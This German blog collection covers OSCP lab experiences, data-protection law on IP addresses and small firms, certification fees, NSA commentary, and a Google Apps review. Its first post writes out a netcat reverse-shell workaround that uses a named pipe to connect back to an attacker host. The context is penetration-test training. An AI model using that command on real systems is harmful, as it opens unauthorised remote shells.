Manch ein netcat unterstützt nicht die Option -e, sodass eine Remote-Shell über „-e /bin/bash“ nicht funktioniert. Die Abhilfe:
kali# nc -nvlp 4444
host# mknod /tmp/pipe p
host# /bin/sh 0</tmp/pipe | nc kali 4444 1>/tmp/pipe
Eine Named Pipe erstellen. Die Named Pipe zur Eingabe der Shell lenken, die Ausgabe der Shell nach netcat pipen und die Ausgabe von netcat in die Named Pipe umlenken. Fertig ist der Workaround..
Mein aktueller Stand:
Es zieht sich etwas. Das Labor ist enorm groß. Manchmal hat man eine gute Idee und ein wenig Glück, sodass eine Maschine schnell gerootet ist. Dafür rennt man bei anderen Maschinen Angriffsvektoren hinterher, die nicht zu funktionieren scheinen.
Es fühlt sich ein klein wenig an, als würde ich wieder eine wissenschaftliche Abschlussarbeit schreiben. Der OSCP ist sicherlich interessanter, keine Frage. Parallelen gibt es dennoch. Ohne Ausdauer und Ehrgeiz ist auch der OSCP nicht zu schaffen. Insbesondere wenn man noch recht am Anfang ist und mehr als die Hälfte noch vor sich hat.
Ich schätze, dass ich bis zum Ende mehr Zeit investieren werde, als für die Vorbereitungen auf CISSP, CISM, TISP usw. zusammen. Der OSCP bringt 40 CPE für CISSP und CISM – das ist ein lachhafter Wert. Wer den OSCP in 40 Stunden inklusive Prüfung und Dokumentation erfolgreich hinter sich bringt, hat meine Bewunderung verdient. Ich halte das für nahezu unmöglich.
Das Landgericht Berlin hat entschieden (LG Berlin, 31.01.2013 – 57 S 87/08)[1], dass dynamische IP-Adressen keine personenbezogenen Daten sind. Die Richter bemühten sich, die Augen nicht vor der technischen Realität zu verschließen und nicht wie viele Datenschutzbeauftragte unrealistische Annahmen zu treffen, wie einfach doch ein Personenzug herstellbar sei. Ich muss anerkennen, dass das meiner Ansicht nach eine gute Bewertung der Realität und auch ein gutes Urteil ist.
Wirklich viel ist damit aber für niemanden gewonnen. Das Urteil ist keine finale Entscheidung, sodass die Rechtslage weiterhin undurchsichtig bleibt. Ein kleines aber sehr wichtiges Detail wird kaum erläutert: Das Urteil bezieht sich nur auf dynamische IP-Adressen, bei statischen IP-Adressen muss weiterhin von personenbezogenen Daten ausgegangen werden. In der Praxis ändert sich dadurch nichts, das Thema IP-Adresse als personenbezogenes Datum ist weiterhin unklar und man müsste als Unternehmen annehmen, dass IP-Adressen grundsätzlich personenbezogen sind.
Wie kann man sich als Unternehmen rechtssicher und realistisch die Einwilligung eines Nutzers einholen, dass seine IP-Adresse gespeichert werden darf? Ich meine gar nicht. Das eine Unternehmen wird gar keine IP-Adressen mehr speichern und ein anderes weiterhin möglichen rechtlichen Risiken ausgesetzt sein. Beide Alternativen sind schlecht.
Ich finde der gesetzliche Datenschutz muss an die Realität angepasst und reformiert werden.
[1] http://dejure.org/dienste/vernetzung/rechtsprechung?Text=57%20S%2087/08
Das ist jetzt eine kleine Verallgemeinerung, aber in der Regel müssen Unternehmen größer als 9 Personen einen internen oder externen Datenschutzbeauftragten bestellen. Diese Personen müssen zwar mit einer automatisierten Bearbeitung personenbezogener Daten beschäftigt sein, aber bereits durch ein E-Mail-Programm wird diese Voraussetzung erfüllt.
Wie sieht es nun mit kleineren Unternehmen aus: Einzelunternehmen, Personengesellschaften oder kleine GmbHs, die aus 9 Personen oder weniger bestehen? Nun, diese müssen keinen Datenschutzbeauftragten bestellen. Glück gehabt?
Nein, denn die Vorschriften des BDSG gelten dennoch. Verantwortlich für die Einhaltung und Kontrolle des Datenschutzes bleibt die verantwortliche Stelle, das heißt die Person, die die Geschäfte führt. Alle Pflichten aus dem Bundesdatenschutzgesetz sind zu erfüllen und nur die Bestellung eines Datenschutzbeauftragten entfällt. Welche kleine Personengesellschaft oder Kapitalgesellschaft führt nun in der Realität ein Verfahrensverzeichnis? Welches kleine Unternehmen ist auf eine datenschutzrechtliche Auskunftsanfrage von einem Kunden oder auch nur von einem Besucher der Unternehmenswebseite vorbereitet? Ich vermute kaum eins.
Sucht man im Netz nach Vorschriften zum Datenschutz und liest man sich nicht die spannende Bettlektüre des Bundesdatenschutzgesetzes durch, wird einem oftmals der Eindruck vermittelt der gesetzliche Datenschutz gelte nur für Unternehmen mit mehr als 9 Personen. Das stimmt nicht.
In der Praxis hat ein kleines Unternehmen gar keine andere Wahl als auf einen externen Datenschutzbeauftragten zurückzugreifen. Er muss zwar nicht bestellt werden, aber er hat das notwendige Know-how, welches intern meistens nicht zu finden ist. Meistens wird das Thema vom Geschäftsführer jedoch einfach ignoriert und zwar genau so lange, bis das Kind bereits in den Brunnen gefallen ist.
Ich habe heute die jährlichen Gebühren für den CISSP von Isc² und für den CISM von ISACA beglichen. Zum Erhalt der Zertifizierung reicht dies natürlich nicht, da noch der Nachweis von jährlichen CPEs (Continuous Professional Education) zu erbringen ist. Unabhängig davon möchte der Isc² für den CISSP $85 Maintenance Fee. Das kann man nun als viel, wenig oder angemessen betrachten. Ist auch egal, die ISACA nimmt einem diese Entscheidung ab. Der jährliche Preis dort:
Jetzt einmal ernsthaft: Nur $230? Also nur das 2,7 fache als für den Erhalt des CISSP von Isc². Das Preis/Leistungsverhältnis halte ich für verbesserungswürdig. Dagegen ist der Erhalt des CISSP günstig.
Vielen Dank liebe NSA für diese herausragende Security Awareness-Kampagne in der deutschen Bevölkerung. Erst am Anfang einmal starke Aufmerksamkeit erwecken, dass unverschlüsselte Kommunikation abgehört werden kann. Korrektur, wird. Die meisten Deutschen wissen nun, dass die NSA durch PRISM mitlesen kann, wenn sie möchte. So arbeitet man klar heraus, warum man z.B. bei vertraulicher Kommunikation Verschlüsselung einsetzen sollte. In den Medien wimmelte es von Artikeln, wie man PGP oder ähnliches einrichtet. Ein perfekter Einstieg in die erste deutsche Security Awareness-Kampagne. Und das alles kostenlos.
Bevor wirklich wieder Ruhe einkehrt wird bekannt, dass die NSA angeblich auch Verschlüsselung brechen kann. Panik, nichts ist mehr vor der NSA sicher. Damit so eine Kampagne Erfolg hat, einfach immer mal wieder eine bisschen nachschießen. In wie weit diese Aussagen stimmen, sei einmal dahin gestellt und in den Medien wird viel Blödsinn berichtet. Egal, es kommt in den Köpfen an: Man muss starke Geschütze auffahren, wenn man der NSA etwas entgegensetzen möchte.
Der Skandal ebbt nun ab. Ach nein, stimmt ja gar nicht. Die NSA soll auch die Bundesregierung abhören. Perfekt, niemand ist vor der NSA sicher. Es ist nicht nur die eigene Privatsphäre bedroht, sondern auch die der deutschen Kanzlerin. Dass Frau Merkel eigentlich ein sicheres Mobiltelefon habe sollte, und sie manchen Presseberichten nach auch gerne mit gewöhnlichen Mobiltelefon kommuniziert, passt perfekt als Botschaft: Wer Krypto zur Verfügung hat und sie nicht einsetzt, ist selbst dran schuld. Die NSA hört und liest mit.
Danke NSA. Was kommt nächsten Monat? Vielleicht hat der BND die NSA bei der Abhöraktion von Frau Merkel unterstützt? Man darf gespannt sein.
Wer Ironie findet, darf sie gerne behalten.
Ich habe einen VServer bei 1&1 geordert, der direkt mit Centos aufgesetzt wurde. Nachdem ich persönlich eine andere Distribution bevorzuge, wollte ich ihn neu initialisieren lassen. Vor der Initialisierung kann man ein neues Initialpasswort festlegen. Gesagt, getan:
Ja natürlich, wie kann ich nur auf die Idee kommen ein Passwort länger als 12 Zeichen zu benutzen. Wer macht das schon und warum auch? Also wieder zurück in den keepassx und ein neues Passwort generieren lassen. Dieses Mal mit 12 Zeichen. Sicher ist sicher.
Passwörter länger als 12 Zeichen sind böse, Passwörter mit Sonderzeichen erlaubt das System auch nicht. Das ist jetzt ein schlechter Scherz oder? Ich konnte dann gerade noch widerstehen als Passwort 123456 auszuprobieren.
Über das eigene Labpanel kann man beim OSCP Server in ihren Ausgangszustand zurückversetzen (reverten). Man kann zwar selbst jeden Tag nur eine begrenzte Anzahl von Servern reverten, dennoch lohnt es sich, dieses vor einem Angriff durchzuführen.
Andere OSCP-Studenten hinterlassen eventuell defekte Applikationen oder Files wie Webshells, die einen eigenen Angriff entweder beeinträchtigen können oder zumindest das Potential haben für Verwirrung zu sorgen.
Ich nutze seit ein paar Monaten Google Apps for Business. Davon insbesondere Mail, Drive, Kalender, und Kontakte. Die anderen verfügbaren Apps nur gelegentlich oder gar nicht. Ich zahle aktuell etwas unter 5€ für jeden Nutzer pro Monat.
Das Beste vorweg: Mail, Drive, Kalender & Co funktionieren zuverlässig, auch wenn in der Startphase mein eigener Account nicht richtig funktionierte. Ich konnte keine Mails verschicken oder empfangen noch das Paket administrieren. Nach ein paar Tagen wurden die Probleme behoben und traten auch nicht mehr auf. Wo der Fehler lag, wurde mir leider nicht mitgeteilt.
Ansonsten bin ich mit Google Mail sehr zufrieden, die anderen Apps wie Drive, Kalender oder Kontakte halte ich persönlich nicht für 100% business-ready. Bei Drive gibt es kein (einfach bedienbares) Berechtigungskonzept und die Erstellung von Drive eigenen Dokumenten ist zwar möglich, ich bin mittlerweile aber davon abgekommen und nutze Drive nur noch als Ablage in der Cloud. Drive ist keine Konkurrenz zu Microsoft Office oder Open Office. Für mal eben schnell 1-2 Sätze schreiben ok, fürs Geschäft eher ungeeignet.
Ich kann mit meinem Account Kalendereinträge von anderen verschieben, löschen, erstellen usw. Sicher ist das ein privilegierter Account, aber ich habe noch nicht einmal gefunden, wie ich dieses Verhalten abstellen könnte. Ein gutes Rollen- und Berechtigungskonzept sieht anders aus. Bei den Kontakten bin ich aber verzweifelt. Es gibt ohne auf weitere Software zu setzen, die Google direkt per API anspricht, anscheinend keine Möglichkeit globale unternehmensweise Kontakte zu definieren.
Irgendwann habe ich den Eindruck gewonnen, dass Google Apps for Business zwar eine gutes Produkt ist, aber eher für einen 1-Mann-Betrieb. Ich nutze weiterhin die kostenpflichtigen Produkte von Google, aber in einem geringeren Umfang als ich eigentlich wollte.
Meine erste Bilanz:
Ich habe schon in vielen Berichten gelesen, wie steil die Lernkurve beim OSCP ist und wie umfangreich der Kurs. Jetzt kann ich es nachvollziehen. Es stimmt auch, dass der OSCP in keiner Art und Weise vergleichbar mit anderen Sicherheitszertifizierungen ist. Während man bei CISSP, CISM & Co sehr vieles einfach auswendig lernen kann, ist der OSCP absolut praktisch orientiert. Hier wird nichts auswendig gelernt, hier werden Anwendungen und Systeme gehackt. Über z.B. SQL Injections lesen ist die eine Sache, sie praktisch durchzuführen eine andere. Ich empfinde den OSCP bisher als recht anstrengend, aber auch als extrem lehrreich und fesselnd.
Kleiner Tipp am Rande: Wenn man über das eigene Adminpanel versucht einen Rechner zurückzusetzen und es scheint nicht zu funktionieren: Es ist eher kein Systemfehler sondern hat einen relativ einfachen Grund…
